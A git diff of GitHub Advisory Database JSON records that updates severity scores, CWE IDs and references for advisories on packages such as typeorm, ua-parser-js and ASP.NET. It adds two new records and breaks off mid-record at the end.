diff --git a/advisories/github-reviewed/2019/05/GHSA-vmhw-fhj6-m3g5/GHSA-vmhw-fhj6-m3g5.json b/advisories/github-reviewed/2019/05/GHSA-vmhw-fhj6-m3g5/GHSA-vmhw-fhj6-m3g5.json index 973d93994f746..5654c7e079d4f 100644 --- a/advisories/github-reviewed/2019/05/GHSA-vmhw-fhj6-m3g5/GHSA-vmhw-fhj6-m3g5.json +++ b/advisories/github-reviewed/2019/05/GHSA-vmhw-fhj6-m3g5/GHSA-vmhw-fhj6-m3g5.json @@ -1,12 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-vmhw-fhj6-m3g5", - "modified": "2020-08-31T18:31:33Z", + "modified": "2026-02-11T22:27:32Z", "published": "2019-05-31T23:46:33Z", "aliases": [], "summary": "Path Traversal in angular-http-server", "details": "Versions of `angular-http-server` before 1.4.4 are vulnerable to path traversal.\n\n\n## Recommendation\n\nUpdate to version 1.4.4 or later.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [ { "package": { @@ -37,6 +42,10 @@ "type": "WEB", "url": "https://hackerone.com/reports/330349" }, + { + "type": "PACKAGE", + "url": "https://github.com/simonh1000/angular-http-server" + }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/656" diff --git a/advisories/github-reviewed/2019/06/GHSA-w7q7-vjp8-7jv4/GHSA-w7q7-vjp8-7jv4.json b/advisories/github-reviewed/2019/06/GHSA-w7q7-vjp8-7jv4/GHSA-w7q7-vjp8-7jv4.json index 370e7fde573b9..fdca58b905280 100644 --- a/advisories/github-reviewed/2019/06/GHSA-w7q7-vjp8-7jv4/GHSA-w7q7-vjp8-7jv4.json +++ b/advisories/github-reviewed/2019/06/GHSA-w7q7-vjp8-7jv4/GHSA-w7q7-vjp8-7jv4.json @@ -1,12 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-w7q7-vjp8-7jv4", - "modified": "2020-08-31T18:36:13Z", + "modified": "2026-02-11T22:05:23Z", "published": "2019-06-06T15:30:16Z", "aliases": [], "summary": "SQL Injection in typeorm", "details": "Versions of `typeorm` before 0.1.15 are vulnerable to SQL Injection. Field names are not properly validated allowing attackers to inject SQL statements and execute arbitrary SQL queries.\n\n\n## Recommendation\n\nUpgrade to version 0.1.15", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [ { "package": { @@ -37,6 +42,10 @@ "type": "WEB", "url": "https://hackerone.com/reports/319458" }, + { + "type": "PACKAGE", + "url": "https://github.com/typeorm/typeorm" + }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/800" @@ -46,7 +55,7 @@ "cwe_ids": [ "CWE-89" ], - "severity": "HIGH", + "severity": "CRITICAL", "github_reviewed": true, "github_reviewed_at": "2019-06-05T21:25:43Z", "nvd_published_at": null diff --git a/advisories/github-reviewed/2021/10/GHSA-pjwm-rvh2-c87w/GHSA-pjwm-rvh2-c87w.json b/advisories/github-reviewed/2021/10/GHSA-pjwm-rvh2-c87w/GHSA-pjwm-rvh2-c87w.json index 9ef5757001b98..b1da087ffa98d 100644 --- a/advisories/github-reviewed/2021/10/GHSA-pjwm-rvh2-c87w/GHSA-pjwm-rvh2-c87w.json +++ b/advisories/github-reviewed/2021/10/GHSA-pjwm-rvh2-c87w/GHSA-pjwm-rvh2-c87w.json @@ -1,9 +1,11 @@ { "schema_version": "1.4.0", "id": "GHSA-pjwm-rvh2-c87w", - "modified": "2023-07-28T15:38:48Z", + "modified": "2026-02-17T21:57:43Z", "published": "2021-10-22T20:38:14Z", - "aliases": [], + "aliases": [ + "CVE-2021-4229" + ], "summary": "Embedded malware in ua-parser-js", "details": "The npm package `ua-parser-js` had three versions published with malicious code. Users of affected versions (0.7.29, 0.8.0, 1.0.0) should upgrade as soon as possible and check their systems for suspicious activity. See [this issue](https://github.com/faisalman/ua-parser-js/issues/536) for details as they unfold.\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "severity": [ diff --git a/advisories/github-reviewed/2022/04/GHSA-gx7g-wjxg-jwwj/GHSA-gx7g-wjxg-jwwj.json b/advisories/github-reviewed/2022/04/GHSA-gx7g-wjxg-jwwj/GHSA-gx7g-wjxg-jwwj.json index eaad37ba99926..d4b0769563ba5 100644 --- a/advisories/github-reviewed/2022/04/GHSA-gx7g-wjxg-jwwj/GHSA-gx7g-wjxg-jwwj.json +++ b/advisories/github-reviewed/2022/04/GHSA-gx7g-wjxg-jwwj/GHSA-gx7g-wjxg-jwwj.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-gx7g-wjxg-jwwj", - "modified": "2022-04-18T22:17:42Z", + "modified": "2026-02-18T23:33:34Z", "published": "2022-04-04T00:00:55Z", "aliases": [ "CVE-2022-0088" @@ -52,6 +52,10 @@ "type": "WEB", "url": "https://github.com/yourls/yourls/commit/1de256d8694b0ec7d4df2ac1d5976d4055e09d59" }, + { + "type": "WEB", + "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2022-0088.md" + }, { "type": "PACKAGE", "url": "https://github.com/yourls/yourls" diff --git a/advisories/github-reviewed/2022/05/GHSA-236c-vhj4-gfxg/GHSA-236c-vhj4-gfxg.json b/advisories/github-reviewed/2022/05/GHSA-236c-vhj4-gfxg/GHSA-236c-vhj4-gfxg.json new file mode 100644 index 0000000000000..5e254e659881b --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-236c-vhj4-gfxg/GHSA-236c-vhj4-gfxg.json @@ -0,0 +1,112 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-236c-vhj4-gfxg", + "modified": "2026-02-17T21:40:20Z", + "published": "2022-05-25T00:00:31Z", + "withdrawn": "2026-02-17T21:40:20Z", + "aliases": [], + "summary": "Duplicate Advisory: Embedded malware in ua-parser-js", + "details": "### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-pjwm-rvh2-c87w. This link is maintained to preserve external references.\n\n### Original Description\nA vulnerability was found in ua-parser-js 0.7.29/0.8.0/1.0.0. It has been rated as critical. This issue affects the crypto mining component which introduces a backdoor. Upgrading to version 0.7.30, 0.8.1 and 1.0.1 is able to address this issue. It is recommended to upgrade the affected component.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "ua-parser-js" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.7.29" + }, + { + "fixed": "0.7.30" + } + ] + } + ], + "versions": [ + "0.7.29" + ] + }, + { + "package": { + "ecosystem": "npm", + "name": "ua-parser-js" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.8.0" + }, + { + "fixed": "0.8.1" + } + ] + } + ], + "versions": [ + "0.8.0" + ] + }, + { + "package": { + "ecosystem": "npm", + "name": "ua-parser-js" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.0.0" + }, + { + "fixed": "1.0.1" + } + ] + } + ], + "versions": [ + "1.0.0" + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-4229" + }, + { + "type": "WEB", + "url": "https://github.com/faisalman/ua-parser-js/issues/536" + }, + { + "type": "ADVISORY", + "url": "https://github.com/advisories/GHSA-pjwm-rvh2-c87w" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.185453" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-829", + "CWE-912" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T21:40:20Z", + "nvd_published_at": "2022-05-24T16:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-52rh-5rpj-c3w6/GHSA-52rh-5rpj-c3w6.json b/advisories/github-reviewed/2022/05/GHSA-52rh-5rpj-c3w6/GHSA-52rh-5rpj-c3w6.json index 0f6a0ef977880..5cb0b96a625d0 100644 --- a/advisories/github-reviewed/2022/05/GHSA-52rh-5rpj-c3w6/GHSA-52rh-5rpj-c3w6.json +++ b/advisories/github-reviewed/2022/05/GHSA-52rh-5rpj-c3w6/GHSA-52rh-5rpj-c3w6.json @@ -1,12 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-52rh-5rpj-c3w6", - "modified": "2022-05-05T16:00:50Z", + "modified": "2026-02-11T21:54:44Z", "published": "2022-05-05T16:00:50Z", "aliases": [], "summary": "Improper handling of multiline messages in node-irc", "details": "node-irc is a socket wrapper for the IRC protocol that extends Node.js' EventEmitter. The vulnerability allows an attacker to manipulate a Matrix user into executing IRC commands by having them reply to a maliciously crafted message. Incorrect handling of a CR character allowed for making part of the message be sent to the IRC server verbatim rather than as a message to the channel.\nThe vulnerability has been patched in node-irc version 1.2.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [ { "package": { @@ -36,6 +41,10 @@ "type": "WEB", "url": "https://github.com/matrix-org/node-irc/security/advisories/GHSA-52rh-5rpj-c3w6" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-29166" + }, { "type": "WEB", "url": "https://github.com/matrix-org/node-irc/commit/2976c856df37660a9d664e94c857c796de2e34f7" @@ -54,7 +63,10 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-74", + "CWE-93" + ], "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2022-05-05T16:00:50Z", diff --git a/advisories/github-reviewed/2022/05/GHSA-m2ch-x2q7-2284/GHSA-m2ch-x2q7-2284.json b/advisories/github-reviewed/2022/05/GHSA-m2ch-x2q7-2284/GHSA-m2ch-x2q7-2284.json new file mode 100644 index 0000000000000..98bbe8382ac18 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-m2ch-x2q7-2284/GHSA-m2ch-x2q7-2284.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m2ch-x2q7-2284", + "modified": "2026-02-12T15:43:41Z", + "published": "2022-05-24T17:21:07Z", + "aliases": [ + "CVE-2017-18912" + ], + "summary": "Mattermost Server allows an attacker to specify a full pathname of a log file", + "details": "An issue was discovered in Mattermost Server before 3.7.5. It allows an attacker to specify a full pathname of a log file.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:H/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.7.4-0.20170404171331-0b5c0794fdcb" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-18912" + }, + { + "type": "WEB", + "url": "https://github.com/mattermost/mattermost/commit/0b5c0794fdcbb551c1233dcdfbdf5c7deb585fd6" + }, + { + "type": "PACKAGE", + "url": "https://github.com/mattermost/mattermost" + }, + { + "type": "WEB", + "url": "https://mattermost.com/security-updates" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-12T15:43:41Z", + "nvd_published_at": "2020-06-19T19:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/10/GHSA-mg5h-rhjq-6v84/GHSA-mg5h-rhjq-6v84.json b/advisories/github-reviewed/2022/10/GHSA-mg5h-rhjq-6v84/GHSA-mg5h-rhjq-6v84.json index d452d221466e0..2950526f06122 100644 --- a/advisories/github-reviewed/2022/10/GHSA-mg5h-rhjq-6v84/GHSA-mg5h-rhjq-6v84.json +++ b/advisories/github-reviewed/2022/10/GHSA-mg5h-rhjq-6v84/GHSA-mg5h-rhjq-6v84.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-mg5h-rhjq-6v84", - "modified": "2022-11-01T20:35:47Z", + "modified": "2026-02-18T23:33:51Z", "published": "2022-10-31T12:00:18Z", "aliases": [ "CVE-2022-3766" @@ -44,6 +44,10 @@ "type": "WEB", "url": "https://github.com/thorsten/phpmyfaq/commit/c7904f2236c6c0dd64c2226b90c30af0f7e5a72d" }, + { + "type": "WEB", + "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2022-3766.md" + }, { "type": "PACKAGE", "url": "https://github.com/thorsten/phpmyfaq" diff --git a/advisories/github-reviewed/2022/12/GHSA-cp9c-phxx-55xm/GHSA-cp9c-phxx-55xm.json b/advisories/github-reviewed/2022/12/GHSA-cp9c-phxx-55xm/GHSA-cp9c-phxx-55xm.json index 3becc89af6f0e..38c97bebed5e5 100644 --- a/advisories/github-reviewed/2022/12/GHSA-cp9c-phxx-55xm/GHSA-cp9c-phxx-55xm.json +++ b/advisories/github-reviewed/2022/12/GHSA-cp9c-phxx-55xm/GHSA-cp9c-phxx-55xm.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-cp9c-phxx-55xm", - "modified": "2022-12-12T22:08:01Z", + "modified": "2026-02-18T23:34:01Z", "published": "2022-12-11T15:30:45Z", "aliases": [ "CVE-2022-4407" @@ -44,6 +44,10 @@ "type": "WEB", "url": "https://github.com/thorsten/phpmyfaq/commit/1d73af34bf42764f9f9491c7ba5e9495d70e3ca5" }, + { + "type": "WEB", + "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2022-4407.md" + }, { "type": "PACKAGE", "url": "https://github.com/thorsten/phpmyfaq" diff --git a/advisories/github-reviewed/2023/01/GHSA-qjm7-55vv-3c5f/GHSA-qjm7-55vv-3c5f.json b/advisories/github-reviewed/2023/01/GHSA-qjm7-55vv-3c5f/GHSA-qjm7-55vv-3c5f.json index 8d3278ddb2d50..f6754d1003fb4 100644 --- a/advisories/github-reviewed/2023/01/GHSA-qjm7-55vv-3c5f/GHSA-qjm7-55vv-3c5f.json +++ b/advisories/github-reviewed/2023/01/GHSA-qjm7-55vv-3c5f/GHSA-qjm7-55vv-3c5f.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-qjm7-55vv-3c5f", - "modified": "2023-01-20T23:35:16Z", + "modified": "2026-02-17T22:04:14Z", "published": "2023-01-18T03:31:17Z", "aliases": [ "CVE-2018-25077" ], "summary": "mel-spintax has Inefficient Regular Expression Complexity", "details": "A vulnerability was found in melnaron mel-spintax. It has been rated as problematic. Affected by this issue is some unknown functionality of the file `lib/spintax.js`. The manipulation of the argument text leads to inefficient regular expression complexity. The name of the patch is 37767617846e27b87b63004e30216e8f919637d3. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-218456.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + } + ], "affected": [ { "package": { diff --git a/advisories/github-reviewed/2023/01/GHSA-vm74-j4wq-82xj/GHSA-vm74-j4wq-82xj.json b/advisories/github-reviewed/2023/01/GHSA-vm74-j4wq-82xj/GHSA-vm74-j4wq-82xj.json index f9e33a67fda75..852c72f7cbb42 100644 --- a/advisories/github-reviewed/2023/01/GHSA-vm74-j4wq-82xj/GHSA-vm74-j4wq-82xj.json +++ b/advisories/github-reviewed/2023/01/GHSA-vm74-j4wq-82xj/GHSA-vm74-j4wq-82xj.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-vm74-j4wq-82xj", - "modified": "2024-03-01T14:28:55Z", + "modified": "2026-02-17T22:04:50Z", "published": "2023-01-17T21:30:22Z", "aliases": [ "CVE-2022-4891" ], "summary": "Sisimai Inefficient Regular Expression Complexity vulnerability", "details": "A vulnerability has been found in Sisimai up to 4.25.14p11 and classified as problematic. This vulnerability affects the function `to_plain` of the file `lib/sisimai/string.rb`. The manipulation leads to inefficient regular expression complexity. The exploit has been disclosed to the public and may be used. Upgrading to version 4.25.14p12 is able to address this issue. The name of the patch is 51fe2e6521c9c02b421b383943dc9e4bbbe65d4e. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-218452.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + } + ], "affected": [ { "package": { diff --git a/advisories/github-reviewed/2024/02/GHSA-g74q-5xw3-j7q9/GHSA-g74q-5xw3-j7q9.json b/advisories/github-reviewed/2024/02/GHSA-g74q-5xw3-j7q9/GHSA-g74q-5xw3-j7q9.json index 3ef93a9f6af83..5f7a7b4f87119 100644 --- a/advisories/github-reviewed/2024/02/GHSA-g74q-5xw3-j7q9/GHSA-g74q-5xw3-j7q9.json +++ b/advisories/github-reviewed/2024/02/GHSA-g74q-5xw3-j7q9/GHSA-g74q-5xw3-j7q9.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-g74q-5xw3-j7q9", - "modified": "2024-03-19T18:00:01Z", + "modified": "2026-02-17T22:01:33Z", "published": "2024-02-13T19:49:43Z", "aliases": [ "CVE-2024-21386" ], "summary": "Microsoft Security Advisory CVE-2024-21386: .NET Denial of Service Vulnerability", "details": "# Microsoft Security Advisory CVE-2024-21386: .NET Denial of Service Vulnerability\n\n## Executive summary\n\nMicrosoft is releasing this security advisory to provide information about a vulnerability in ASP.NET 6.0, ASP.NET 7.0 and, ASP.NET 8.0 . This advisory also provides guidance on what developers can do to update their applications to address this vulnerability.\n\nA vulnerability exists in ASP.NET applications using SignalR where a malicious client can result in a denial-of-service.\n\n\n## Announcement\n\nAnnouncement for this issue can be found at https://github.com/dotnet/announcements/issues/295\n\n### Mitigation factors\n\nMicrosoft has not identified any mitigating factors for this vulnerability.\n\n## Affected software\n\n* Any .NET 6.0 application running on .NET 6.0.26 or earlier.\n* Any .NET 7.0 application running on .NET 7.0.15 or earlier.\n* Any .NET 8.0 application running on .NET 8.0.1 or earlier.\n\n## Affected Packages\nThe vulnerability affects any Microsoft .NET Core project if it uses any of affected packages versions listed below\n\n### ASP.NET 6.0\n\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[Microsoft.AspNetCore.App.Runtime.linux-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.linux-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.linux-musl-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.linux-musl-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.linux-musl-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-x64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.linux-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-x64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.osx-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-arm64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.osx-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-x64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x86) | <= 6.0.26 | 6.0.27\n\n\n\n### ASP.NET 7.0\n\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[Microsoft.AspNetCore.App.Runtime.linux-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.linux-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.linux-musl-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.linux-musl-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.linux-musl-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-x64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.linux-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-x64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.osx-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-arm64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.osx-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-x64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x86) | <= 7.0.15 | 7.0.16\n\n### ASP.NET 8.0\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[Microsoft.AspNetCore.App.Runtime.linux-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.linux-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm64) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.linux-musl-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.linux-musl-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm64) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.linux-musl-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-x64) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.linux-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-x64) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.osx-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-arm64) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.osx-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-x64) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm64) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x64) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x86) | <= 8.0.1 | 8.0.2\n\n## Advisory FAQ\n\n### How do I know if I am affected?\n\nIf you have a runtime or SDK with a version listed, or an affected package listed in [affected software](#affected-software) or [affected packages](#affected-packages) , you're exposed to the vulnerability.\n\n### How do I fix the issue?\n\n* To fix the issue please install the latest version of .NET 8.0 or .NET 7.0 or .NET 6.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs.\n* If you have .NET 6.0 or greater installed, you can list the versions you have installed by running the `dotnet --info` command. You will see output like the following;\n\n```\n.NET Core SDK (reflecting any global.json):\n\n Version: 6.0.200\n Commit: 8473146e7d\n\nRuntime Environment:\n\n OS Name: Windows\n OS Version: 10.0.18363\n OS Platform: Windows\n RID: win10-x64\n Base Path: C:\\Program Files\\dotnet\\sdk\\6.0.300\\\n\nHost (useful for support):\n\n Version: 6.0.5\n Commit: 8473146e7d\n\n.NET Core SDKs installed:\n\n 6.0.200 [C:\\Program Files\\dotnet\\sdk]\n\n.NET Core runtimes installed:\n\n Microsoft.AspNetCore.App 6.0.5 [C:\\Program Files\\dotnet\\shared\\Microsoft.AspNetCore.App]\n Microsoft.NETCore.App 6.0.5 [C:\\Program Files\\dotnet\\shared\\Microsoft.NETCore.App]\n Microsoft.WindowsDesktop.App 6.0.5 [C:\\Program Files\\dotnet\\shared\\Microsoft.WindowsDesktop.App]\n\nTo install additional .NET Core runtimes or SDKs:\n https://aka.ms/dotnet-download\n```\n\n* If you're using .NET 8.0, you should download and install .NET 8.0.2 Runtime or .NET 8.0.102 SDK (for Visual Studio 2022 v17.8) from https://dotnet.microsoft.com/download/dotnet-core/8.0.\n* If you're using .NET 7.0, you should download and install Runtime 7.0.16 or SDK 7.0.116 (for Visual Studio 2022 v17.4) from https://dotnet.microsoft.com/download/dotnet-core/7.0.\n* If you're using .NET 6.0, you should download and install Runtime 6.0.27 or SDK 6.0.419 from https://dotnet.microsoft.com/download/dotnet-core/6.0.\n\n.NET 6.0, .NET 7.0 and, .NET 8.0 updates are also available from Microsoft Update. To access this either type \"Check for updates\" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates.\n\nOnce you have installed the updated runtime or SDK, restart your apps for the update to take effect.\n\nAdditionally, if you've deployed [self-contained applications](https://docs.microsoft.com/dotnet/core/deploying/#self-contained-deployments-scd) targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed.\n\n## Other Information\n\n### Reporting Security Issues\n\nIf you have found a potential security issue in .NET 8.0 or .NET 7.0 or .NET 6.0, please email details to secure@microsoft.com. Reports may qualify for the Microsoft .NET Core & .NET 5 Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at .\n\n### Support\n\nYou can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime and https://github.com/dotnet/aspnet/. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue.\n\n### Disclaimer\n\nThe information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\n\n### External Links\n\n[CVE-2024-21386]( https://www.cve.org/CVERecord?id=CVE-2024-21386)\n\n### Revisions\n\nV1.0 (February 13, 2024): Advisory published.\n\n_Version 1.0_\n\n_Last Updated 2024-02-13_", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [ { "package": { @@ -822,8 +827,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": "CRITICAL", + "cwe_ids": [ + "CWE-400" + ], + "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2024-02-13T19:49:43Z", "nvd_published_at": null diff --git a/advisories/github-reviewed/2024/03/GHSA-3j27-563v-28wf/GHSA-3j27-563v-28wf.json b/advisories/github-reviewed/2024/03/GHSA-3j27-563v-28wf/GHSA-3j27-563v-28wf.json index 7b894d7fc37d8..08bb6b80dafb3 100644 --- a/advisories/github-reviewed/2024/03/GHSA-3j27-563v-28wf/GHSA-3j27-563v-28wf.json +++ b/advisories/github-reviewed/2024/03/GHSA-3j27-563v-28wf/GHSA-3j27-563v-28wf.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-3j27-563v-28wf", - "modified": 